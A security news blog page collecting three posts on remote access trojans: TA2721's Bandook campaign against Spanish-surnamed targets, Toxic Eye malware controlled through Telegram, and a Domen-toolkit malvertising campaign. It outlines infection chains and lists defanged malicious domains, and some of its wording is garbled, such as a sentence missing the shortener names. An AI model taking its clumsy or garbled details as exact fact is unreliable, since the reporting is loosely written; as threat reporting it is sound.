Search This Blog

Showing posts with label Remote Access Trojan. Show all posts

Caliente Bandits Target Spanish Speaking Individuals to Spread Bandook Malware


A new hacking gang TA2721 also commonly known as Caliente Bandits has been tracked by Proofpoint researchers since January 2021. As per the researchers, the group is actively targeting many industries, primarily focusing on entertainment and finance. 

The organization is distributing a known but rarely employed, RAT trojan known as Bandook; they are using the Spanish language lures to do so. Researchers have labeled the group 'Caliente Bandits' as they use the hot-mail accounts. The Spanish term "Caliente" refers to "hot." 

Researchers with evidence had started tracking this group in January 2021 and it was observed around April that TA2721 distributes Bándok's weekly email threats. Although the group is attacking several organizations across the world, those with Spanish surnames remain the primary target. It is worth noting that the ESET cybersecurity company initially disclosed malware data used by the group. 

The campaign uses the very same budget or transaction theme to encourage users to download a PDF repetitively. A URL and password are included in the attached PDF which leads to the installation of a Bandook password-protected package. 

According to Proofpoint, TA2721 sent emails in 2021, to fewer than 100 organizations. This list covered institutions in the United States, Europe, and South America. These attacks concentrated mostly on organizations with Spanish surnames like Pérez, Castillo, Ortiz, etc. 

Reportedly, two variants of Bandook, commodities malware, were spread by the threat actor. Meanwhile, scientists observed the wrongdoer adopting detection evasion measures such as infected archives' password encryption. 

The threat actor would often send links from Hotmail or Gmail addresses to the Bandook download. Terms such as "PRESUPUEST" and "COTIZACION" are generally found in subject lines and email names. However, the actor shared URLs directly in one effort in June. Researchers have found that URLs used abbreviated URLs from and, which they have observed from January to June 2021. These links redirected to Spideroak[.]com, a real hosting file, for a counterfeit RAR file to be downloaded. 

The Bandook - Remote Access Technology (RAT), which has been accessible commercially in the wild since 2007, was written in Delphi. It could be used for audio and video capturing and recording, keylogging, and data theft. 

The evidence suggests that TA2721 will continue to use a small number of malware variants from Bandook, a comparable chain of infections, and pick few C2 domains. The precise targeting shows that the threat actor recognizes target entities prior to email threats are sent.

Toxic Eye Malware is Utilizing Telegram


As of 2021, numerous users left WhatsApp for messaging to various other applications that promised improved data protection only after the company announced that it might default share user metadata with Facebook. Many of those users turned to Telegram and Signal, which proves to be the competitive applications against WhatsApp. 

As per Sensor Tower, Telegram was perhaps the most installed application with over 63 million downloads in January 2021. Telegram chatting is still not encoded as in Signal Chat end-to-end encryption is there, but now Telegram does have another issue: malware. 

Software Check Point team recently found that cybercriminals use Telegram for something like a malware program named Toxic Eye as a communications platform. It turns out that certain aspects of Telegram are much more readily accessible by attackers than it is by web-based tools. Today, they have handy Telegram Bots to mess up with compromised machines. 

Toxic Eye is a kind of malware known as a remote access trojan (RAT). RATs can remotely monitor an intruder over an infected machine, which means that the attacker could steal host computer data, destroy, or copy files, hamper the operations of an infected machine, and much more. The Toxic Eye RAT is distributed through an e-mail with an encoded EXE file to a destination. The software installs the malware on the user computer if the target users access the file. 

RATs are comparable to programs of remote access and can be used to control user devices, for instance, by someone in technical support. However, even without authorization, these programs sneak in. They could imitate or hide with legitimate files that sometimes are concealed as a document or are inserted in a broader video game file. 

Attackers used Telegram to remotely manipulate malicious software. Check Point analyst Omer Hofman claims that from February until April 2021 the company found 130 Toxic Eye attacks with this tool, and some items make Telegram valuable to bad players who distribute malware. 

The firewall program doesn't obstruct Telegram. The network control tools are also not blocked. It's a user-friendly app that most people recognize as genuine, then let their guards down. 

The researcher's advice is that one must not access email attachments from unidentified senders, which raises suspicion. Also, take care of appendices containing usernames. Malicious emails also contain the username or an attachment title in the subject line. It is possibly malicious if the sender attempts to sound urgent, dangerous, or compulsive and forces the user to click upon a link or attachment or to provide sensitive data. If possible, then one must use anti-phishing tools.

Attention! Malvertising Campaigns Using Exploit Kits On The Rise

Of all the things that online advertising could be used for, spreading malware is the one that throws you off the list by surpassing them all.

Not of late, researchers found out a recent ‘Malvertising’ campaign and sources say that it was done by way of the “Domen Social Engineering Toolkit”.
‘Malvertising’ (malicious advertising) could be defined as using online advertising means for spreading malware. Most typically it is done by inserting malware or malicious advertisements into legitimate advertising web pages or networks.

Per informed sources, this campaign was uncovered while trying to influence a VPN service as bait. It displayed a group of domains that gave Domen’s attack mechanism a fresh bend.

The construction of the campaign, as mentioned in reports, was such that ‘search-one[.]info’ was comprised in it as the ‘fake’ page, ‘mix-world[.]best’ as the download site and ‘panel-admin[.]best as the backend panel.

As revealed in reports, the campaign managed to redirect the users and bare them to ‘Smoke Loader’. This is conceivably a downloader that installs secondary payloads. And that’s what it did. They consisted of a ‘Vidar stealer’, ‘Buran ransomware’ and ‘IntelRapid cryptominer’.

Need not to mention, this campaign isn’t the first one to surface which was focused on payloads. Women's malvertising per source had commenced in September last year. The social engineering toolkit was employed to exploit the website and fool users into clicking on a fake ‘Adobe Flash Player’ update. The clicking would start a download of “download.hta”. Afterward, by way of employing PowerShell to connect to “xyxyxyxyxy[.]xyz”, only to download the 'NetSupport Remote Access Trojan' (RAT), later.

With amplification in the usage of the internet and online means, it becomes a top priority to build up a structured and strong defense mechanism to fight and prevent Malvertising.

Hiring security professionals is a safe pre-requisite and a building block towards creating the defense structure. Keeping abreast of the latest updates and patches must be a primary priority.

Word has it that in most cases the ‘exploit kits’ are employed to disseminate the malware payloads. Hence the organizations should have a clear account of all its obstruction points so that Malvertising campaign’s attack payloads could be detected and dealt with in time.